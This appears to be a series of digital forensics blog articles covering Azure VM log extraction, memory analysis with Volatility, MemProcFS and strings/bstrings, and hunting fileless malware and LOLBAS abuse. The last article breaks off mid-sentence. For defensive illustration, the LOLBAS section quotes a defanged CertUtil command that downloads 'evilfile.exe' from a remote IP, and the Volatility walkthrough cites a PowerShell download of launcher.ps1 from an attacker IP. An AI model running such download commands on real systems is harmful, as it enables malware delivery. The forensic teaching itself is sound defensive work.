----------------------------------------------------------------------------------------------------------- How This Script Helps: VM Information for Analysis : The extracted data (VM ID and VM size) is essential for identifying and analyzing the virtual machines involved in an incident. $results = get-azlog -ResourceProvider "Microsoft.Compute" -DetailedOutput $results.Properties | foreach {$_} | foreach { $contents = $_.content if ($contents -and $contents.ContainsKey("responseBody")) { $fromjson = ($contents.responseBody | ConvertFrom-Json) $newobj = New-Object psobject $newobj | Add-Member NoteProperty VmId $fromjson.properties.vmId $newobj | Add-Member NoteProperty Vmsize $fromjson.properties.hardwareprofile.vmsize $newobj } } ----------------------------------------------------------------------------------------------------------- Conclusion: In Azure, combining effective Network Security Group (NSG)  management with automated VM log extraction  provides essential visibility for incident response. Understanding traffic control through NSGs and using PowerShell scripts for VM log retrieval empowers organizations to investigate security incidents efficiently, even without advanced security tools like SIEM. Akash Patel ---------------------------------------------------------------------------------------------------------- Special Thanks (Iqra) I would like to extend my heartfelt gratitude to one of my dearest colleagues, a Microsoft Certified Trainer, for her invaluable assistance in creating these articles. Without her support, this would not have been possible. Thank you so much for your time, expertise, and dedication! https://www.linkedin.com/in/iqrabintishafi/ -------------------------------------------------------------------------------------------------------------

  • "Step-by-Step Guide to Uncovering Threats with Volatility: A Beginner’s Memory Forensics Walkthrough"

    Alright, let’s dive into a straightforward guide to memory analysis using Volatility. Memory forensics is a vast field, but I’ll take you through an overview of some core techniques to get valuable insights. Let’s go Notes: "This is not a complete analysis; it’s an overview of key steps. In memory forensics, findings can be hit or miss—sometimes we uncover valuable data, sometimes we don’t, so it’s essential to work carefully." Step 1: Basic System Information with windows.info Let’s start by getting a basic overview of the memory image using the windows.info plugin. This gives us essential details like the operating system version, kernel debugging info, and more , which helps us ensure the plugins we’ll use are compatible. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.info Step 2: Listing Active Processes with windows.pslist Now, I’ll list all active processes using windows.pslist and save the output . This helps identify running processes, their parent-child relationships, and a general look at what’s happening in memory. p ython3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.pslist > ./testing/pslist.txt I’m storing the output so we can refer back to it easily . With pslist, we can identify processes and their parent-child links , which can help detect suspicious activity if any processes don’t align with expected behavior. (I am using the SANS Material to make sure processes aligned with parent child) Step 3: Finding Hidden Processes with windows.psscan Next, we move to windows.psscan, which scans for processes, even hidden ones that pslist might miss. This is especially useful for finding malware or processes that don’t show up in regular listings. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.psscan > ./testing/psscan.txt After running psscan, I’ll sort and compare the results with pslist  to see if anything stands out. A quick diff can reveal processes that may be hiding: sort ./testing/psscan.txt > ./testing/a.txt sort ./testing/pslist.txt > ./testing/b.txt diff ./testing/a.txt ./testing/b.txt In my analysis, I found some suspicious processes like whoami.exe and duplicate mscorsvw.exe  entries, which I’ll dig into further to verify their legitimacy. (Later analysis mscorsvw is legit ) Step 4: Examining Process Trees with windows.pstree To get a clearer view of how processes are linked, I’ll use windows.pstree. This shows the process hierarchy, making it easier to spot unusual or suspicious chains, like a random process launching powershell.exe  under a legitimate parent. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.pstree > ./testing/pstree.txt During my analysis, I noticed a powershell.exe instance that used encoded commands to connect to a suspicious IP (http[:]//192.168.200.128[:]3000/launcher.ps1). This could be an indicator of compromise, possibly indicating a malicious script being downloaded and executed. Step 5: Checking Command-Line Arguments with windows.cmdline Now, I’ll use the windows.cmdline plugin to check command-line arguments for processes. This is helpful because attackers often use command-line parameters to hide activity. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.cmdline > ./testing/ cmdline.txt Here, I’m filtering out standard system paths(System 32) to make it easier to focus on anything that might look unusual . If there’s any suspicious execution path, this command can help spot it quickly. (Make sure it doesn't means attacker run processes from comandline) cat ./testing/cmdline.txt | grep -i -v 'system32' Step 6: Reviewing Security Identifiers with windows.getsids To understand the permissions and user context of the processes we’ve identified as suspicious, I’ll check their Security Identifiers (SIDs) using windows.getsids . This can tell us who ran a specific process, helping narrow down potential attacker accounts. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.getsids > ./testing/getsids.txt I’m searching for the user that initiated each suspicious process to see if it’s linked to an unauthorized or unusual account. (For example if you see above screenshot we have identifed powershell and cmd execution) So i have searched through text file: cat ./testing/getsids.txt | grep -i cmd.exe Step 7: Checking Network Connections with windows.netscan Next, I’ll scan for open network connections with windows.netscan to see if any suspicious processes are making unauthorized connections . This is crucial for detecting any malware reaching out to a command-and-control (C2) server. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.netscan > ./testing/netscan.txt In this case, I found some closed connections to a suspicious IP (192.168.200.128:8443), initiated by powershell.exe. This further confirms the likelihood of malicious activity Step 8: Module Analysis with windows.ldrmodules To see if there are unusual DLLs or modules loaded into suspicious processes, I’ll use windows.ldrmodules. This can help catch injected modules or rogue DLLs. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.ldrmodules > ./testing/ldrmodule.txt cat ./testing/ldrmodule.txt | egrep -i 'cmd|powershell' In very simple language: If you see even single one false you have to analyse it manually whether its legit or not (Mostly you will got lot of false positive. This is where DFIR examiner is there to identify if this is legit) Step 9: Detecting Malicious Code with windows.malfind Finally, I’ll scan for potential malicious code within processes using windows.malfind . This command helps by detecting suspicious memory sections marked as PAGE_EXECUTE_READWRITE, which attackers often use. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.malfind > ./testing/malfind.txt Next step I have looked into PID for power shells/cmd. So i can dump those and run antivirus scan or use strings or bstrings. cat ./testing/malfind.txt | grep -i 'PAGE_EXECUTE_READWRITE' I have identified powershell PID and noted down dump an the powershell related malfind processes: (One by One) for PID 5908,6164,8308,1876 (as per screemshot) python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.malfind --dump --pid 5908 Once done now u can run string or bstring to identify character in them or run full disk scan again dump or give it to reverse engineer(Thats on you) (There are commnds avaible you can use those, Again this is an overview you can dig deeper. More commmands you can find in my previous article) https://www.cyberengage.org/post/unveiling-volatility-3-a-guide-to-extracting-digital-artifacts -------------------------------------------------------------------------------------------------------- Digging into Registry Hives Step 1 Moving on to the registry, I’ll first check which hives are available using windows.registry.hivelist. Important hives like NTUSER.DAT can hold valuable info, including recently accessed files. python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.hivelist If you see above screenshot we have most important hives usrclass.dat and Ntuser.dat Fist get a offset of usrclass.dat - 0x9f0c25e75000 and ntuser.dat - 0x9f0c25be8000  in our case Than to check which data is avaible under these two hives: python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25be8000  As you can see screenshot little data is intact: After this you can do two things First dump these hives and use tool like registry explorer to analyse further like normal windows registry analysis or You can do is dump all the output in txt file and analyse it here your choice: Lets do with txt file: python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25be8000 --recurse > ./testing/ntuser.txt Step 2 Checking User Activity with UserAssist Plugin The userassist plugin helps verify i f specific applications or files were executed by the user— like PowerShell commands. Results may vary, and in this case, it might not yield any findings. Lets suppose this does not work out for me: than use the above ntuser.dat method dumping all userassist into .txt using --recurse and analyse manually (Just change the offset) example: python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25e75000 --recurse > ./testing/usrclss.txt Step 3 Scanning for Key Files with Filescan python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.filescan > ./testing/filescan.txt See this is not necessary but why its important .(you can simply use above first and second steps to extract and dump for analysis using registry explorer or examining manually its on you Lets suppose you ran filescan and saved output and you want to check which if you hives like SAM hives or security hives: cat ./testing/filescan.txt | grep -i 'usrclass.dat' | grep 'analyst' This above command will grep usrclass,dat and then grep user analyst, because the powershell executed under user account analyst. Now after going through i have identified multiple hives there that might be useful. I have noted all the offset and what i am going to do is dump all the hives and analyse using registry explorer. Step 4 Dumping Specific Files (Like NTuser.dat, usrclass.dat) python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.dumpfiles --virtaddr Use this for additional files or executable of interest. If data is retrieved, analyze it with tools like RegRipper. Step 5 Similar to above you can search for keyword "history" in filescan.txt if you find history files related to browser or psreadline.txt dump it out analyse it. If u dumping browser history us can browserhistory viewer from nirsoft Step 6 Logs Analysis you can search for logs in our case cat ./testing/filescan.txt | grep -i '.evtx' you can dump the logs and use evtxcmd to parse the logs and analyse it. ------------------------------------------------------------------------------------------------------------- Once done with volatility what i always do. run the strings or bstrings.exe against my Memory images using the IOC i have identified to look for if i can get extra hit and i missed out something example: (If you look above i have found launches.ps1 in IOCs) running strings and bstring again the memory image bstring | grep -i 'launcher.ps1' Below screenshot i looked for IP we have identified as IOC This is what i do after running volatility you do not have do it but its on you! How to run strings/bstrings.exe there is article created link below do check it out https://www.cyberengage.org/post/memory-forensics-using-strings-and-bstrings-a-comprehensive-guide ------------------------------------------------------------------------------------------------------------- Next I have run MemProc5 Analyzer: Dirty Logs in MemProcFS Examining logs, such as those found in MPLogs\Dirty\, reveals possible threats, like PowerShell Grampus or Mimikatz: There are legit files as well u have to defined its legit or not How to run MemProc5 there is article created link below do check it out https://www.cyberengage.org/post/memprocfs-memprocfs-analyzer-comprehensive-analysis-guide ------------------------------------------------------------------------------------------------------------- Conclusion Alright, so we’ve walked through a high-level approach to memory forensics here. E ach tool and plugin we used, like Volatility and MemProcFS, gave us a way to dig into different artifacts, whether it was registry entries, logs, or user files. Some methods hit, some miss—memory analysis can be like that, but the key is to stay thorough. Remember, you may or may not find everything you’re looking for. But whatever you do uncover, like IOCs or specific user actions, adds to your investigation . Just keep at it, keep testing, and let each artifact guide your next step. This is all part of the process—memory forensics is about making the most out of what you have, one artifact at a time. Akash Patel

  • MemProcFS/MemProcFS Analyzer: Comprehensive Analysis Guide

    MemProcFS  is a powerful memory forensics tool that allows forensic investigators to mount raw memory images as a virtual file system . This enables direct analysis of memory artifacts without the need for heavy processing tools. It simplifies the process by converting the memory dump into a filesystem with readable structures like processes, drivers, services, etc. This guide covers best practices for using MemProcFS, from mounting a memory image to performing in-depth analysis using various tools and techniques. -------------------------------------------------------------------------------------------------------- Mounting the Image with MemProcFS The basic command to mount a memory dump using MemProcFS is: MemProcFS.exe -device c:\temp\memdump-win10x64.raw This mounts the memory dump as a virtual file system. However, the best way to use MemProcFS is by taking advantage of its built-in Yara rules  provided by Elastic. These Yara rules allow you to scan for Indicators of Compromise (IOCs) such as malware signatures, suspicious files, and behaviors within the memory image. Command with Elastic Yara Rules To mount a memory image and enable Elastic's Yara rules, use the following command: MemProcFS.exe -device -forensic 1 -license-accept-elastic-license-2.0 The -forensic 1 flag ensures that the image is mounted with forensic options enabled, while the -license-accept-elastic-license-2.0 flag accepts Elastic's license terms for the built-in Yara rules. -------------------------------------------------------------------------------------------------------- Methods for Analysis There are multiple ways to analyze the mounted memory image. Below are the three most common methods: Using WSL (Windows Subsystem for Linux) Using Windows Explorer Using MemProcFS Analyzer Suite 1. Analyzing with WSL (Windows Subsystem for Linux) One of the most efficient ways to analyze the memory dump is by using the Linux shell within Windows, i.e., WSL . By doing this, you can easily use Linux tools such as grep, awk, and strings to filter and search through the mounted image. Step 1: Create a Directory in WSL First, create a directory in WSL where you will mount the memory image: sudo mkdir /mnt/d Step 2: Mount the Windows Memory Image to WSL Next, mount the Windows memory image to the directory you just created. Assuming the image is mounted on the M: drive in Windows, you can mount it to WSL with the following command: sudo mount -t drvfs M: /mnt/d This command mounts the M: drive (where MemProcFS has mounted the memory image) to the /mnt/d directory in WSL . Now you can access the mounted memory dump via WSL for further analysis using grep, awk, strings, and other Linux-based utilities. -------------------------------------------------------------------------------------------------------- 2. Analyzing with Windows Explorer MemProcFS makes it easy to browse the memory image using Windows Explorer  by exposing critical memory artifacts in a readable format. Here’s what each folder contains: Key Folders and Files Sys Folder : Proc : Proc.txt: Lists processes running in memory. Proc-v.txt: Displays detailed command-line information for the processes. Drivers : ers.txt: Contains information about drivers loaded in memory. Net : Netstat.txt: Lists network information at the time of acquisition. Netstat-v.txt: Provides details about network paths used by processes. Services : Services.txt: Lists installed services. Subfolder /byname: Provides detailed information for each service. Tasks : Task.txt: Contains information about scheduled tasks in memory. Name Folder : Contains folders for each process with detailed information such as files, handles, modules, and Virtual Address Descriptors (VADs). PID Folder : Similar to the Name Folder , but uses Process IDs (PIDs) instead of process names. Registry Folder : Contains all registry keys and values available in memory during the dump. Forensic Folder : CSV files  (e.g., pslist.csv): Easily analyzable using Eric Zimmerman's tools. Timeline : Contains timestamped events related to memory activity, available in both .csv and .txt formats. Files Folder : Attempts to reconstruct the system's C: drive from memory. NTFS Folder : Attempts to reconstruct the NTFS file system structure from memory. Yara Folder : Contains results from Yara scans, populated if Yara scanning is enabled. FindEvil Folder: You must determine if files are malicious or legitimate. -------------------------------------------------------------------------------------------------------- 3. Using MemProcFS Analyzer Suite For more automated analysis, MemProcFS comes with an Analyzer Suite that simplifies the process by running pre-configured scripts to extract and analyze data from the memory image. Step 1: Download and Install Analyzer Suite First, download the MemProcFS Analyzer Suite . Inside the suite folder, you will find a script named updater.ps1. Run this script in PowerShell  to d ownload all the necessary binaries and tools for analysis: Step 2: Run the Analyzer Once the setup is complete, you can begin your automated analysis by running the MemProcFS-Analyzer.ps1 script: .\MemProcFS-Analyzer.ps1 This will launch the GUI  for MemProcFS Analyzer . You can then select the mounted memory image and (optionally) the pagefile if it is available. Once you run the analysis, MemProcFS will automatically extract and analyze the data . -------------------------------------------------------------------------------------------------------- Output and Results After running the MemProcFS analysis, the results will be saved in a folder under the script directory. Make sure that you have 7-Zip  installed, as some of the output may be archived. The default password for the archives is MemProcFS . Key Output Files : Parsed Files : Contains all the data successfully parsed by MemProcFS. Unparsed Files : Lists data that could not be parsed by the tool. For further analysis, you can manually review these files using tools like Volatility 3  or by leveraging WSL tools. By reviewing both parsed and unparsed files, you can ensure that no critical information is missed during the analysis. -------------------------------------------------------------------------------------------------------- Considerations and Best Practices Antivirus Interference If you are running MemProcFS Analyzer in a environment, your antivirus software may block certain forensic tools. To avoid interruptions, it is recommended to create exclusions for the tools used by MemProcFS Analyzer or, if necessary, temporarily disable the antivirus software during the analysis. Manual Review of Unparsed Data While MemProcFS automates many aspects of memory forensics, it is crucial to manually check files that were not parsed during the automated process. These files can be analyzed using other memory forensic tools like Volatility 3 , or through manual inspection using WSL commands. -------------------------------------------------------------------------------------------------------- Conclusion MemProcFS  offers a powerful and efficient way to analyze memory dumps by mounting them as a virtual file system. This method allows for both manual and automated analysis using familiar tools like grep, awk, strings, and the MemProcFS Analyzer Suite . Whether you are performing quick IOC triage or a detailed forensic analysis, MemProcFS can handle a wide range of memory artifacts, from processes and drivers to network activity and registry keys. Key Takeaways : MemProcFS is versatile, offering both manual and automated analysis methods. Use Elastic’s built-in Yara rules to enhance your malware detection capabilities. Leverage WSL or Windows Explorer to manually browse and analyze memory artifacts. The Analyzer Suite automates much of the forensic process, saving time and effort. Always review unparsed files to ensure nothing critical is missed. Akash Patel

  • Memory Forensics Using Strings and Bstrings: A Comprehensive Guide

    Memory forensics  involves extracting and analyzing data from a computer's volatile memory (RAM) to identify potential Indicators of Compromise (IOCs) or forensic artifacts crucial for incident response. This type of analysis can uncover malicious activity, such as hidden malware, sensitive data, and encryption keys, even after a machine has been powered off. Two key tools frequently used in this process are Strings  and Bstrings . While both help extract readable characters from memory dumps, they offer distinct features that make them suitable for different environments. In this article, we’ll cover the functionality of both tools, provide practical examples, and explore how they can aid in quick identification of IOCs during memory forensics. Tools Overview 1. Strings Functionality : Extracts printable characters from files or memory dumps. Usage : Primarily used in Linux/Unix environments , although it can be utilized in other systems via compatible setups.(Example Windows WSL) Key Features : Lightweight and easy to use. Can be combined with search filters like grep to narrow down relevant results. 2. Bstrings (by Eric Zimmerman) Functionality : A similar tool to Strings, but d esigned specifically for Windows environments. It offers additional features such as regex support  and advanced filtering. Key Features : Regex support for powerful search capabilities. Windows-native, making it ideal for handling Windows memory dumps. Capable of offset-based searches. Basic Usage 1. Using Strings in Linux/Unix Environments The strings tool is commonly used to extract printable (readable) characters from binary files, such as memory dumps. Its core functionality is simple but powerful when combined with additional filters, such as grep. Example: Extracting IP Addresses If you are hunting for a specific IOC, such as an IP address in a memory dump , you can extract printable characters and pipe the results through grep to filter the output. strings | grep -I Example for an IP address : strings mem.dump | grep -i 192\.168\.0\. This command will extract any printable characters from the memory dump (mem.dump) and filter the results for the IP address 192.168.0.*. Example for a filename : strings mem.dump | grep -i akash\.exe Here, it searches for the filename akash.exe within the memory dump. Note : For bstrings.exe in Windows, the same search can be done without using escape characters (\). This makes it easier to input IP addresses or filenames directly: IP address : 192.168.0 Filename : akash.exe ----------------------------------------------------------------------------------------------- 2. Contextual Search Finding an IOC in a memory dump is only the beginning. To better understand the context in which the IOC appears, y ou may want to see the lines surrounding the match. This can give insights into related processes, network connections, or file paths. strings | grep -i -C5 Example : strings mem.dump | grep -i -C5 akash.exe The -C5 option tells grep to show five lines above and five lines below the matching IOC (akash.exe). This helps to investigate the surrounding artifacts and provides additional context for analysis. ----------------------------------------------------------------------------------------------- 3. Advanced Usage with Offsets When you use strings with volatility (another powerful memory forensics tool) , it’s essential to retrieve offsets. Offsets allow you to pinpoint the exact location of an artifact within the memory image , which is vital for correlating with other forensic evidence. strings -tx | grep -i -C5 Example : strings -tx mem.dump | grep -i -C5 akash.exe Here, the -tx option provides the offsets of the matches within the file, allowing for more precise analysis, especially when using memory analysis tools like Volatility. ----------------------------------------------------------------------------------------------- Using Bstrings.exe in Windows The bstrings.exe tool operates similarly to strings, but is designed for Windows environments and includes advanced features such as regex support  and output saving . Basic Operation bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --ls This command extracts printable characters from the specified memory dump and searches for a specific pattern or IOC. Example : bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --ls qemu-img-win-x64-2_3_0.zip ----------------------------------------------------------------------------------------------- Regex Support Bstrings offers regex pattern matching, allowing for flexible searches. This can be especially useful when looking for patterns like email addresses, MAC addresses, or URLs. Example of listing available regex patterns : bstrings.exe -p Example of applying a regex pattern for MAC addresses : bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --lr mac ----------------------------------------------------------------------------------------------- Saving the Output Often, forensic investigators need to save the results for later review or for reporting. Bstrings allows easy output saving. bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" -o output.txt This saves the output to output.txt for future reference or detailed analysis. ----------------------------------------------------------------------------------------------- Practical Scenarios for Memory Forensics Corrupted Memory Image In certain cases, memory images may be corrupted or incomplete . Tools like Volatility or MemProc may fail to process these images. In such scenarios, strings and bstrings.exe can still be incredibly useful by extracting whatever readable data remains , allowing you to salvage critical IOCs. Quick IOC Identification These tools are particularly valuable for triage . During an investigation, quickly scanning a memory dump for IOCs (such as suspicious filenames, IP addresses, or domain names) can direct the next steps of a forensic investigation. If no IOCs are found, the investigator can move on to more sophisticated or time-consuming methods. ----------------------------------------------------------------------------------------------- Conclusion Memory forensics is a crucial part of modern incident response, and tools like strings and bstrings.exe can significantly accelerate the process . Their ability to extract readable characters from memory dumps and apply search filters makes them invaluable for forensic investigators, especially in cases where traditional analysis tools may fail. Key Takeaways : Strings  is ideal for Unix/Linux environments, while Bstrings  is tailored for Windows. Both tools offer powerful search capabilities, including contextual search  and offset-based analysis . Bstrings  provides additional features like regex support  and output saving . These tools help quickly identify IOCs, even in challenging scenarios like corrupted memory images. Whether you’re dealing with a large memory dump or a corrupted image, these tools offer a simple yet effective way to sift through data and uncover critical forensic artifacts Akash Patel

  • Unveiling Volatility 3: A Guide to Installation and Memory Analysis on Windows and WSL

    Today, let's dive into the fascinating world of digital forensics by exploring Volatility 3 —a powerful framework used for extracting crucial digital artifacts from volatile memory (RAM). Volatility enables investigators to analyze a system’s runtime state, providing deep insights into what was happening at the time of memory capture. While some forensic suites like OS Forensics  offer integrated Volatility functionality, this guide will show you how to install and run Volatility 3  on Windows  and WSL  (Windows Subsystem for Linux). Given the popularity of Windows, it's a practical starting point for many investigators. Moreover, WSL allows you to leverage Linux-based forensic tools, which can often be more efficient. Installing Volatility 3 on Windows: Before diving in, ensure you have three essential tools installed: Python 3: Download Python 3 from the Microsoft Store. Git for Windows: Click here Microsoft C++ Build Tool: Download it Once these tools are installed, follow these steps to set up Volatility 3: Head to the Volatility GitHub repository here . Copy the repository link. Open PowerShell and run: git clone Check the Python version using: python -V Navigate to the Volatility folder in PowerShell and run DIR (for Windows) or ls (for Linux). Run the command: pip install -r .\requirements.txt Verify the Volatility version: python vol.py -v Extracting Digital Artifacts: Now that Volatility is set up, you'll need a memory image to analyze. You can obtain this image using tools like FTK Imager or other image capture tools . -------------------------------------------------------------------------------------------------------- H ere are a few basic commands to get you started: python vol.py -v (Displays tool information). python vol.py -f D:\memdump.mem windows.info Provides information about the Windows system from which the memory was collected. Modify windows.info for different functionalities. D:\memdump.mem (Path of memory image) 3. python vol.py -f D:\memdump.mem windows.handles - Lists handles in the memory image. Use -h for the help menu. Significance of -pid Parameter in Memory Forensics is used as a parameter. Now you guys will think what's point using python in volatility 3. python vol.py -f D:\memdump.mem windows.pslist | Select-String chrome This command showcases the use of a search string (Select-String) to filter the pslist output for specific processes like 'chrome.' While Select-String isn't a part of Volatility 3 itself, integrating it with Python offers a similar functionality to 'grep' in Linux, facilitating data extraction based on defined criteria. Few Important commands: windows.pstree (Will give hierarchy view) windows.psscan (find unlinked hidden processes) windows.netstat windows.cmdline (what haven been run from where it have been run any special arguments he used) windows.malfind (in case of legit you will not get anything for legit processes) windows.hashdump (showed hash password on windows) windows.netscan Windows.ldrmodules A "True" within a column means the DLL was present, and a "False" means the DLL was not present in the list. By comparing the results, we can visually determine which DLLs might have been unlinked or suspiciously loaded, and hence malicious. More commands with details you will found in this link click here ------------------------------------------------------------------------------------------------------------- Why Switch to WSL for Forensics? As forensic analysis evolves, using Windows Subsystem for Linux (WSL)  has become a more efficient option for running tools like Volatility 3 . With WSL, you can run Linux-based tools natively on your Windows machine, giving you the flexibility and compatibility benefits of a Linux environment without the need for dual-booting or virtual machines. Install WSL by running: wsl --install https://learn.microsoft.com/en-us/windows/wsl/install To install Volatility 3 on WSL : 1. Install Dependencies Before installing Volatility 3, you need to install the required dependencies: s udo apt update sudo apt install -y python3-pip python3-pefile python3-yara 2. Installing PyCrypto (Optional) While PyCrypto  was a common requirement, it is now considered outdated. If installing it works, great! If not, you can move on: pip3 install pycrypto If PyCrypto doesn’t install correctly, don’t worry—Volatility 3 can still function effectively without it in most cases. 3. Clone the Volatility 3 Repository Next, clone the official Volatility 3  repository from GitHub: git clone https://github.com/volatilityfoundation/volatility3.git cd volatility3 4. Verify the Installation To confirm that Volatility 3 is installed successfully, run the following command to display the help menu: python3 vol.py -h | more If you see the help options, your installation was successful, and you’re ready to begin memory analysis. ------------------------------------------------------------------------------------------------------------ Why WSL is Essential for Forensic Analysis Forensic tools like Volatility 3  often run more smoothly in a Linux environment due to Linux’s lightweight nature and better compatibility with certain dependencies and libraries. WSL allows you to run a full Linux distribution natively on your Windows machine without the need for a virtual machine or dual-booting . This means you can enjoy the power and flexibility of Linux while still working within your familiar Windows environment. ---------------------------------------------------------------------------------------------------- Conclusion Forensic analysis, especially with tools like Volatility 3 , becomes far more efficient when leveraging WSL . It offers better performance, compatibility with Linux-based tools, and ease of maintenance compared to traditional Windows installations. I hope this guide has provided a clear pathway for setting up and running Volatility 3 on both Windows and WSL, empowering you to optimize your forensic workflows. Now, you might wonder: "I’ve given the commands for running Volatility 3 on Windows—what about WSL?" The good news is that the commands remain the same for WSL, as the underlying process is the same; only the environment differs. In upcoming articles, I’ll cover tools like MemProcFS, Strings, and how to perform comprehensive memory analysis using all three. Until then, happy hunting and keep learning! 👋 Akash Patel

  • Fileless Malware || LOLBAS || LOLBAS Hunting Using Prefetch, Event Logs, and Sysmon

    Fileless malware refers to malicious software that does not rely on traditional executable files on the filesystem , but it is important to emphasize that " fileless" does not equate to "artifactless." Evidence of such attacks often exists in various forms across the disk and system memory, making it crucial for Digital Forensics and Incident Response (DFIR) specialists to know where to look. Key Locations for Artifact Discovery Even in fileless malware attacks, traces can be found in several places: Evidence of execution:  Prefetch, Shimcache, and AppCompatCache Registry keys:  Large binary data or encoded PowerShell commands. Event logs:  Process creation, service creation, and Task Scheduler events. PowerShell artifacts:  PowerShell transcripts and PSReadLine Scheduled Tasks:  Attackers may schedule malicious tasks to persist. Autorun/Startup keys WMI Event Consumers:  These can be exploited to run malicious code without leaving typical executable trace s. Example 1: DLL Side-Loading with PlugX DLL side-loading is a stealthy technique used by malware like PlugX , where legitimate software is abused to load malicious DLLs into memory. The typical attack steps involve: Phishing email : The attacker sends a phishing email to the victim. Decoy file and dropper : The victim opens a l egitimate-looking file (e.g., a spreadsheet) that also delivers the payload. Dropper execution : A dropper executable (e.g., ews.exe) is saved to disk, dropping several files. One of these, oinfop11.exe, is a legitimate part of Office 2003, making it appear trusted . Malicious DLL injection : The legitimate executable loads a spoofed DLL (oinfo11.ocx), which decrypts and activates the actual malware. At this point, the malicious DLL operates in the memory space of a trusted program, evading traditional detection mechanisms. Example 2: Registry Key Abuse In another example, attackers may modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  registry key . This key can be used to launch PowerShell scripts via Windows Script Host (WSH), enabling the attacker to execute code every time the system boots up. Example 3: WMI Event Filters and Fake Updaters Attackers often leverage WMI  (Windows Management Instrumentation) to create event filters that trigger malicious activities, such as launching a fake updater. In this scenario: WMI  uses regsvr32.exe to call out to a malicious site. The malicious site hosts additional malware files, furthering the attack. Living Off the Land (LOLBAS) Attacks Living Off the Land Binaries and Scripts ( LOLBAS)  refer to legitimate tools and binaries that attackers exploit for malicious purposes , reducing the need to introduce new files to the system. This approach makes detection more challenging since the binaries are usually trusted system files. The LOLBAS Project The LOLBAS Project  on GitHub compiles data on legitimate Windows binaries and scripts that can be weaponized by attackers. The project categorizes these tools based on their functions, including: https://gtfobins.github.io/ https://lolbas-project.github.io/ Alternate Data Streams (ADS)  manipulation AWL bypasses  (e.g., bypassing AppLocker) Credential dumping  and code compilation Reconnaissance  and UAC bypasses Common LOLBAS in Use Several Windows binaries are frequently misused in the wild: CertUtil.exe Regsvr32.exe RunDLL32.exe ntdsutil.exe Diskshadow.exe Example: CertUtil Misuse An example of CertUtil.exe  being misused involves downloading a file from a remote server. The command used is: certutil.exe -urlcache -split -f http[:]//192.168.182.129[:]8000/evilfile.exe goodfile.exe Several detection points exist here: Command-line arguments : Detect unusual arguments like urlcache using Event ID 4688 (Windows) or Sysmon Event ID 1 . File creation : Detect CertUtil writing to disk using Sysmon Event ID 11 or endpoint detection and response (EDR) solutions. Network activity : CertUtil making network connections on non-standard HTTPS ports is unusual and should be flagged . ---------------------------------------------------------------------------------------------- 1. Hunting LOLBAS Execution with Prefetch LOLBAS (Living Off the Land Binaries and Scripts) refers to the use of legitimate binaries, often pre-installed on Windows systems , that attackers can misuse for malicious purposes. Tools like CertUtil.exe, Regsvr32.exe, and PowerShell  are frequently used in these attacks. Hunting for these within enterprise environments requires collecting data from various sources such as prefetch files, event logs, and process data. Prefetch Hunting Tips : Prefetch data  is stored in the C:\Windows\Prefetch folde r and provides insight into recently executed binaries. Velociraptor  is a great tool for collecting and analyzing prefetch files across an enterprise environment. Running a regex search for specific LOLBAS tools such as sdelete.exe, certutil.exe, or taskkill.ex e can help narrow down suspicious executions. To perform a regex search using Velociraptor: Step 1 : Collect prefetch files. Step 2 : Apply regex filters to search for known LOLBAS tools. Key Considerations : Prefetch hunting can be noisy due to legitimate execution of trusted binaries. Analyze paths  used by the binaries. For example, C:\Windows\System32\spool\drivers\color\ is commonly abused due to its write permissions. Look for rarely seen executables or unusual paths that might indicate lateral movement or privilege escalation. 2. Intelligence Gathering: Suspicious Emails and Threat Hunts When a suspicious email is reported, especially after an initial compromise: SOC actions : SOC analysts may update email filters, remove copies from the mailserver, but must also hunt across endpoints for signs of delivery. U sing the SHA1 hash  of the malicious file can help locate copies on other endpoints. For example : you can use Velociraptor with Generic.Forensic.LocalHashes.Init  to build a hash database, and then populate it with GenericForensic.LocalHashes.Glob. 3. Endpoint Data Hunting Key areas for LOLBAS detection on endpoints: Prefetch Files : As mentioned, rarely used executables like CertUtil or Regsvr32  may signal LOLBAS activity. Running Processes : Collect processes from all endpoints. Uncommon processes, especially those tied to known LOLBAS binaries, should be investigated. 4. SIEM and Event Log Analysis Event logs and SIEM tools offer key visibility for LOLBAS detection: Sysmon Event 1 (Process Creation) : Captures process creation events and contains critical information like command-line arguments and file hashes. Windows Security Event 4688 : This event captures process creation events , and when paired with Event 4689  (process termination ), it provides complete context for process lifetime, which can be useful in detecting LOLBAS activity. Common LOLBAS Detection via Event Logs : CertUtil.exe : Detect by filtering for the user agent string Microsoft-CryptoAPI/*. PowerShell : Detect suspicious PowerShell execution using its user agent string: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.610 Microsoft BITS/* – BITS ----------------------------------------------------------------------------------------------------------- 1. Hunting Process Creation Events with Sysmon (Event ID 1) Sysmon's Event ID 1  (Process Creation) is a critical log for detecting Living Off the Land Binaries and Scripts (LOLBAS) attacks, as it provides detailed information about processes that are started on endpoints. However, since LOLBAS attacks often use legitimate, signed executables, it's essential to look beyond basic indicators like file hashes. Key information from Sysmon Event ID 1  includes: Process Hash : While helpful for detecting malicious software, it is less useful for 